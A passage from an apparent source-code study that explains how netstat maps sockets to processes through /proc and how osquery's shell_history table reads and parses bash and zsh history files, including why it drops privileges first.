prg_hash stores the mapping from every inode number to its program, so given an inode number the corresponding program name can be found. But how is prg_hash initialized?

prg_cache_load

Run in debug mode with the -p argument:

netstat-p.png

The program reaches prg_cache_load(); at line 2289; step into prg_cache_load().

Since the function is fairly long, we analyze it in pieces.

1. Obtaining the fds

#define PATH_PROC      "/proc"
#define PATH_FD_SUFF    "fd"
#define PATH_FD_SUFFl       strlen(PATH_FD_SUFF)
#define PATH_PROC_X_FD      PATH_PROC "/%s/" PATH_FD_SUFF
#define PATH_CMDLINE    "cmdline"
#define PATH_CMDLINEl       strlen(PATH_CMDLINE)
 
if (!(dirproc=opendir(PATH_PROC))) goto fail;
    while (errno = 0, direproc = readdir(dirproc)) {
    for (cs = direproc->d_name; *cs; cs++)
        if (!isdigit(*cs))
        break;
    if (*cs)
        continue;
    procfdlen = snprintf(line,sizeof(line),PATH_PROC_X_FD,direproc->d_name);
    if (procfdlen <= 0 || procfdlen >= sizeof(line) - 5)
        continue;
    errno = 0;
    dirfd = opendir(line);
    if (! dirfd) {
        if (errno == EACCES)
        eacces = 1;
        continue;
    }
    line[procfdlen] = '/';
    cmdlp = NULL;

1. dirproc=opendir(PATH_PROC); and errno = 0, direproc = readdir(dirproc) iterate over /proc to obtain all pids.

2. procfdlen = snprintf(line, sizeof(line), PATH_PROC_X_FD, direproc->d_name); builds the /proc/<pid>/fd path for each process.

3. dirfd = opendir(line); obtains a handle to the /proc/<pid>/fd directory.

2. Obtaining the inode

while ((direfd = readdir(dirfd))) {
        /* Skip . and .. */
        if (!isdigit(direfd->d_name[0]))
            continue;
    if (procfdlen + 1 + strlen(direfd->d_name) + 1 > sizeof(line))
       continue;
    memcpy(line + procfdlen - PATH_FD_SUFFl, PATH_FD_SUFF "/",
        PATH_FD_SUFFl + 1);
    safe_strncpy(line + procfdlen + 1, direfd->d_name,
                    sizeof(line) - procfdlen - 1);
    lnamelen = readlink(line, lname, sizeof(lname) - 1);
    if (lnamelen == -1)
        continue;
        lname[lnamelen] = '\0';  /*make it a null-terminated string*/
 
        if (extract_type_1_socket_inode(lname, &inode) < 0)
            if (extract_type_2_socket_inode(lname, &inode) < 0)
            continue;

1. memcpy(line + procfdlen - PATH_FD_SUFFl, PATH_FD_SUFF "/", PATH_FD_SUFFl + 1); and safe_strncpy(line + procfdlen + 1, direfd->d_name, sizeof(line) - procfdlen - 1); construct the full path of each fd entry, e.g. /proc/<pid>/fd/<n>.

2. lnamelen = readlink(line, lname, sizeof(lname) - 1); resolves the target of the fd link; fds are usually symlinks, pointing either at sockets or at pipes, as shown below:

$ ls -al /proc/1289/fd
total 0
dr-x------ 2 username username  0 May 25 15:45 .
dr-xr-xr-x 9 username username  0 May 25 09:11 ..
lr-x------ 1 username username 64 May 25 16:23 0 -> 'pipe:[365366]'
l-wx------ 1 username username 64 May 25 16:23 1 -> 'pipe:[365367]'
l-wx------ 1 username username 64 May 25 16:23 2 -> 'pipe:[365368]'
lr-x------ 1 username username 64 May 25 16:23 3 -> /proc/uptime

3. extract_type_1_socket_inode extracts the inode number from the link target.

#define PRG_SOCKET_PFX    "socket:["
#define PRG_SOCKET_PFXl (strlen(PRG_SOCKET_PFX))
static int extract_type_1_socket_inode(const char lname[], unsigned long * inode_p) {
 
/* If lname is of the form "socket:[12345]", extract the "12345"
   as *inode_p.  Otherwise, return -1 as *inode_p.
   */
// reject names shorter than strlen("socket:[") + 3
if (strlen(lname) < PRG_SOCKET_PFXl+3) return(-1);
 
// memcmp() compares the first n bytes of two memory regions;
// check that lname starts with "socket:["
if (memcmp(lname, PRG_SOCKET_PFX, PRG_SOCKET_PFXl)) return(-1);
if (lname[strlen(lname)-1] != ']') return(-1);  {
    char inode_str[strlen(lname + 1)];  /* e.g. "12345" */
    const int inode_str_len = strlen(lname) - PRG_SOCKET_PFXl - 1;
    char *serr;
 
    // extract the inode number
    strncpy(inode_str, lname+PRG_SOCKET_PFXl, inode_str_len);
    inode_str[inode_str_len] = '\0';
    *inode_p = strtoul(inode_str, &serr, 0);
    if (!serr || *serr || *inode_p == ~0)
        return(-1);
}

4. Obtaining the program's cmdline

if (!cmdlp) {
    if (procfdlen - PATH_FD_SUFFl + PATH_CMDLINEl >=sizeof(line) - 5)
        continue;
    safe_strncpy(line + procfdlen - PATH_FD_SUFFl, PATH_CMDLINE,sizeof(line) - procfdlen + PATH_FD_SUFFl);
fd = open(line, O_RDONLY);
if (fd < 0)
    continue;
cmdllen = read(fd, cmdlbuf, sizeof(cmdlbuf) - 1);
if (close(fd))
    continue;
if (cmdllen == -1)
    continue;
if (cmdllen < sizeof(cmdlbuf) - 1)
    cmdlbuf[cmdllen]='\0';
if (cmdlbuf[0] == '/' && (cmdlp = strrchr(cmdlbuf, '/')))
    cmdlp++;
else
    cmdlp = cmdlbuf;
}

Since cmdline is a regular readable file, there is no need for readlink() as with the fds; its content can be read directly with read(fd, cmdlbuf, sizeof(cmdlbuf) - 1).

5. snprintf(finbuf, sizeof(finbuf), "%s/%s", direproc->d_name, cmdlp); joins the pid and cmdlp, producing something like 6017/redis-server *.

6. Finally, the program calls prg_cache_add(inode, finbuf, "-"); to add the parsed inode and finbuf to the cache.

prg_cache_add

#define PRG_HASH_SIZE 211
#define PRG_HASHIT(x) ((x) % PRG_HASH_SIZE)
static struct prg_node {
    struct prg_node *next;
    unsigned long inode;
    char name[PROGNAME_WIDTH];
    char scon[SELINUX_WIDTH];
} *prg_hash[ ];
 
static void prg_cache_add(unsigned long inode, char *name, const char *scon)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node **pnp,*pn;
 
    prg_cache_loaded = 2;
    for (pnp = prg_hash + hi; (pn = *pnp); pnp = &pn->next) {
    if (pn->inode == inode) {
        /* Some warning should be appropriate here
           as we got multiple processes for one i-node */
        return;
    }
    }
    if (!(*pnp = malloc(sizeof(**pnp))))
    return;
    pn = *pnp;
    pn->next = NULL;
    pn->inode = inode;
    safe_strncpy(pn->name, name, sizeof(pn->name));
 
    {
    int len = (strlen(scon) - sizeof(pn->scon)) + 1;
    if (len > 0)
            safe_strncpy(pn->scon, &scon[len + 1], sizeof(pn->scon));
    else
            safe_strncpy(pn->scon, scon, sizeof(pn->scon));
    }
 
}

1. unsigned hi = PRG_HASHIT(inode); takes the inode modulo 211 to obtain the hash bucket;

2. for (pnp = prg_hash + hi; (pn = *pnp); pnp = &pn->next) walks the bucket's chain to its end, since each prg_hash bucket is a linked list;

3. pn = *pnp; pn->next = NULL; pn->inode = inode; safe_strncpy(pn->name, name, sizeof(pn->name)); initializes the new node and appends it to the end of the chain.

So prg_hash is a global hash table of linked lists that stores the mapping between inode numbers and pid/cmdline.

prg_cache_get

static const char *prg_cache_get(unsigned long inode)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node *pn;
 
    for (pn = prg_hash[hi]; pn; pn = pn->next)
    if (pn->inode == inode)
        return (pn->name);
    return ("-");
}

Having analyzed prg_cache_add(), prg_cache_get() is straightforward:

1. unsigned hi = PRG_HASHIT(inode); computes the hash bucket from the inode number;

2. for (pn = prg_hash[hi]; pn; pn = pn->next) walks every node in the chain and returns the entry whose inode matches the target.

Summary

This brief analysis shows that netstat works by walking the directories and files under /proc to gather its information. If network connections are being opened and closed frequently on a host, using netstat is therefore quite expensive.

osquery source-code analysis: shell_history

Overview

The previous two articles covered how to use osquery; this one analyzes its source code, focusing on the shell_history and process_open_sockets tables. Studying how these tables are implemented shows how osquery maps SQL queries onto system information, and also deepens our understanding of Linux.

表的说明

shell_history是用于查看shell的历史记录,而process_open_sockets是用于记录主机当前的网络行为。示例用法如下:

shell_history

osquery> select * from shell_history limit 3;
+------+------+-------------------------------------------------------------------+-----------------------------+
| uid  | time | command                                                           | history_file                |
+------+------+-------------------------------------------------------------------+-----------------------------+
| 1000 | 0    | pwd                                                               | /home/username/.bash_history |
| 1000 | 0    | ps -ef                                                            | /home/username/.bash_history |
| 1000 | 0    | ps -ef | grep java                                                | /home/username/.bash_history |
+------+------+-------------------------------------------------------------------+-----------------------------+

Here process_open_sockets shows a reverse-shell connection.

osquery> select * from process_open_sockets order by pid desc limit 1;
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| pid    | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state      | net_namespace |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| 115567 | 3  | 16467630 | 2      | 6        | 192.168.2.142 | 192.168.2.143  | 46368      | 8888        |      | ESTABLISH  | 0             |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+

osquery's code layout is very clean: every table's schema lives under specs, and every table's implementation lives under osquery/tables.

Taking shell_history as the example, its schema is defined in specs/posix/shell_history.table:

table_name("shell_history")
description("A line-delimited (command) table of per-user .*_history data.")
schema([
    Column("uid", BIGINT, "Shell history owner", additional=True),
    Column("time", INTEGER, "Entry timestamp. It could be absent, default value is 0."),
    Column("command", TEXT, "Unparsed date/line/command history line"),
    Column("history_file", TEXT, "Path to the .*_history for this user"),
    ForeignKey(column="uid", table="users"),
])
attributes(user_data=True, no_pkey=True)
implementation("shell_history@genShellHistory")
examples([
    "select * from users join shell_history using (uid)",
])
fuzz_paths([
    "/home",
    "/Users",
])

shell_history.table defines the relevant metadata: the entry point is the genShellHistory() function in shell_history.cpp, and it even supplies a sample SQL statement, select * from users join shell_history using (uid). The implementation, shell_history.cpp, lives at osquery/tables/system/posix/shell_history.cpp.

Likewise, the process_open_sockets schema is in specs/process_open_sockets.table, with implementations under osquery/tables/networking/[linux|freebsd|windows]/process_open_sockets.cpp. Because process_open_sockets exists on multiple platforms, there is a process_open_sockets.cpp for each of linux, freebsd and windows; this article uses the Linux one.

Implementing shell_history

Background

Before reading the code, a few basics. There are many Unix shells: bash, zsh, tcsh, sh, and so on. bash is the most common, shipping as the built-in shell on almost every Unix-like system, while zsh layers many extra features on top of it. Whatever commands we type at a terminal ultimately go through one of these shells.

Running ls -all in a user's home directory reveals a .bash_history file, which records every command entered in the terminal. Similarly, zsh users get a .zsh_history recording their commands.

The home directory may also contain a .bash_sessions directory. As this article explains:

A new folder (~/.bash_sessions/) is used to store HISTFILE’s and .session files that are unique to sessions. If $BASH_SESSION or $TERM_SESSION_ID is set upon launching the shell (i.e. if Terminal is resuming from a saved state), the associated HISTFILE is merged into the current one, and the .session file is ran. Session saving is facilitated by means of an EXIT trap being set for a function bash_update_session_state.

In other words, .bash_sessions stores the HISTFILEs and .session files of individual sessions. If $BASH_SESSION or $TERM_SESSION_ID is set when the shell launches, the session's saved state is restored from them; it also means the *.history files under .bash_sessions record the command history of each individual session.

Analysis

QueryData genShellHistory(QueryContext& context) {
    QueryData results;
    // Iterate over each user
    QueryData users = usersFromContext(context);
    for (const auto& row : users) {
        auto uid = row.find("uid");
        auto gid = row.find("gid");
        auto dir = row.find("directory");
        if (uid != row.end() && gid != row.end() && dir != row.end()) {
            genShellHistoryForUser(uid->second, gid->second, dir->second, results);
            genShellHistoryFromBashSessions(uid->second, dir->second, results);
        }
    }

    return results;
}

Start with genShellHistory(), the entry function of shell_history.cpp, listed above:

It iterates over every user and extracts uid, gid and directory, then calls genShellHistoryForUser() to collect that user's shell history; genShellHistoryFromBashSessions() plays a similar role for bash sessions.

genShellHistoryForUser():

void genShellHistoryForUser(const std::string& uid, const std::string& gid, const std::string& directory, QueryData& results) {
    auto dropper = DropPrivileges::get();
    if (!dropper->dropTo(uid, gid)) {
        VLOG(1) << "Cannot drop privileges to UID " << uid;
        return;
    }

    for (const auto& hfile : kShellHistoryFiles) {
        boost::filesystem::path history_file = directory;
        history_file /= hfile;
        genShellHistoryFromFile(uid, history_file, results);
    }
}

Notice that before doing anything else it calls:

auto dropper = DropPrivileges::get();
if (!dropper->dropTo(uid, gid)) {
    VLOG(1) << "Cannot drop privileges to UID " << uid;
    return;
}

to drop privileges to the given uid/gid. Why do that? When I later asked about it online, I received a very thorough answer:

Think about a scenario where you are a malicious user and you spotted a vulnerability(buffer overflow) which none of us has. In the code (osquery which is running usually with root permission) you also know that history files(controlled by you) are being read by code(osquery). Now you stored a shell code (a code which is capable of destroying anything in the system)such a way that it would overwrite the saved rip. So once the function returns program control is with the injected code(shell code) with root privilege. With dropping privilege you reduce the chance of putting entire system into danger.

There are other mitigation techniques (e.g. stack guard) to avoid above scenario but multiple defenses are required

In short, osquery normally runs as root. If an attacker plants malicious shellcode in .bash_history and osquery has an exploitable bug while reading that file, the attacker could end up executing code as root; dropping privileges first greatly limits that risk.
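Conceptually, the drop can be sketched with the POSIX seteuid/setegid calls. This is a simplified stand-in, not osquery's implementation: the real DropPrivileges also handles supplementary groups and error reporting, and drop_to is my name for it:

```cpp
#include <cassert>
#include <sys/types.h>
#include <unistd.h>

// Switch the *effective* uid/gid before touching user-controlled files.
// Because only the effective ids change, a privileged process can later
// restore them (which is what ~DropPrivileges does).
bool drop_to(uid_t uid, gid_t gid) {
    // Order matters: drop the group first. Once the effective uid is
    // unprivileged, a further setegid() call would be refused.
    if (setegid(gid) != 0)
        return false;
    if (seteuid(uid) != 0)
        return false;
    return true;
}
```

Dropping to the caller's own uid/gid is a harmless no-op, which makes the behavior easy to check without root.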

/**
* @brief The privilege/permissions dropper deconstructor will restore
* effective permissions.
*
* There should only be a single drop of privilege/permission active.
*/
virtual ~DropPrivileges();

As the comment notes, once the dropper object is destructed, the original effective permissions are restored.

It then iterates over kShellHistoryFiles, running genShellHistoryFromFile() for each entry. kShellHistoryFiles was defined earlier as:

const std::vector<std::string> kShellHistoryFiles = {
    ".bash_history", ".zsh_history", ".zhistory", ".history", ".sh_history",
};

These are just the well-known file names the common shells use to record their history. Finally, genShellHistoryFromFile() reads each history file and parses its data:

void genShellHistoryFromFile(const std::string& uid, const boost::filesystem::path& history_file, QueryData& results) {
    std::string history_content;
    if (forensicReadFile(history_file, history_content).ok()) {
        auto bash_timestamp_rx = xp::sregex::compile("^#(?P<timestamp>[0-9]+)$");
        auto zsh_timestamp_rx = xp::sregex::compile("^: {0,10}(?P<timestamp>[0-9]{1,11}):[0-9]+;(?P<command>.*)$");
        std::string prev_bash_timestamp;
        for (const auto& line : split(history_content, "\n")) {
            xp::smatch bash_timestamp_matches;
            xp::smatch zsh_timestamp_matches;

            if (prev_bash_timestamp.empty() &&
                xp::regex_search(line, bash_timestamp_matches, bash_timestamp_rx)) {
                prev_bash_timestamp = bash_timestamp_matches["timestamp"];
                continue;
            }

            Row r;

            if (!prev_bash_timestamp.empty()) {
                r["time"] = INTEGER(prev_bash_timestamp);
                r["command"] = line;
                prev_bash_timestamp.clear();
            } else if (xp::regex_search(
                    line, zsh_timestamp_matches, zsh_timestamp_rx)) {
                std::string timestamp = zsh_timestamp_matches["timestamp"];
                r["time"] = INTEGER(timestamp);
                r["command"] = zsh_timestamp_matches["command"];
            } else {
                r["time"] = INTEGER(0);
                r["command"] = line;
            }

            r["uid"] = uid;
            r["history_file"] = history_file.string();
            results.push_back(r);
        }
    }
}

The logic is very clear:

  1. forensicReadFile(history_file, history_content) reads the file's contents.
  2. The regular expressions bash_timestamp_rx and zsh_timestamp_rx are compiled to parse the corresponding .history formats. for (const auto& line : split(history_content, "\n")) walks the file line by line, matching each line against both expressions.
  3. Row r; ...; r["history_file"] = history_file.string(); results.push_back(r); writes the parsed fields into a Row and appends it to the results.

That completes the parsing for shell_history: executing select * from shell_history runs through this flow and returns every recorded command.
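The per-line parsing can be reproduced with the standard library alone. The sketch below uses std::regex rather than the Boost.Xpressive that osquery actually uses, and the Entry struct and function name are mine:

```cpp
#include <cassert>
#include <regex>
#include <string>

struct Entry {
    long time;            // -1 signals "timestamp line, no entry yet"
    std::string command;
};

// Parse one history line. prev_bash_ts carries a bash "#<timestamp>"
// forward to the command line that follows it, as in the loop above.
Entry parse_history_line(const std::string& line, std::string& prev_bash_ts) {
    static const std::regex bash_ts("^#([0-9]+)$");
    static const std::regex zsh_ts("^: {0,10}([0-9]{1,11}):[0-9]+;(.*)$");
    std::smatch m;
    if (prev_bash_ts.empty() && std::regex_search(line, m, bash_ts)) {
        prev_bash_ts = m[1];   // remember the timestamp for the next line
        return {-1, ""};
    }
    if (!prev_bash_ts.empty()) {
        long t = std::stol(prev_bash_ts);
        prev_bash_ts.clear();
        return {t, line};      // bash: timestamp + following command
    }
    if (std::regex_search(line, m, zsh_ts))
        return {std::stol(m[1]), m[2]};  // zsh extended-history format
    return {0, line};          // no timestamp recorded
}
```

A bash #&lt;timestamp&gt; line yields no entry by itself; the timestamp is held in prev_bash_ts and attached to the following command line, exactly as in the original loop.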

As for genShellHistoryFromBashSessions():

void genShellHistoryFromBashSessions(const std::string &uid,const std::string &directory,QueryData &results) {
    boost::filesystem::path bash_sessions = directory;
    bash_sessions /= ".bash_sessions";

    if (pathExists(bash_sessions)) {
        bash_sessions /= "*.history";
        std::vector <std::string> session_hist_files;
        resolveFilePattern(bash_sessions, session_hist_files);

        for (const auto &hfile : session_hist_files) {
            boost::filesystem::path history_file = hfile;
            genShellHistoryFromFile(uid, history_file, results);
        }
    }
}

genShellHistoryFromBashSessions() collects history in a fairly simple way:

  1. resolve every file matching .bash_sessions/*.history;
  2. call the same genShellHistoryFromFile(uid, history_file, results) on each of them.
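resolveFilePattern() is osquery's own helper; on POSIX systems a rough equivalent of the *.history expansion is glob(3). A sketch under that assumption:

```cpp
#include <cassert>
#include <cstdlib>
#include <glob.h>
#include <string>
#include <vector>

// Expand a shell-style pattern such as "<home>/.bash_sessions/*.history"
// into the list of matching paths, empty when nothing matches.
std::vector<std::string> resolve_pattern(const std::string& pattern) {
    std::vector<std::string> out;
    glob_t g{};
    if (glob(pattern.c_str(), 0, nullptr, &g) == 0)
        for (size_t i = 0; i < g.gl_pathc; ++i)
            out.emplace_back(g.gl_pathv[i]);
    globfree(&g);
    return out;
}
```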

Summary

Reading the source of good open-source software teaches not only the relevant technology but also its design philosophy. A white hat who can learn quickly cannot afford any short planks; what they carry is a large stack of standard planks plus a few long ones.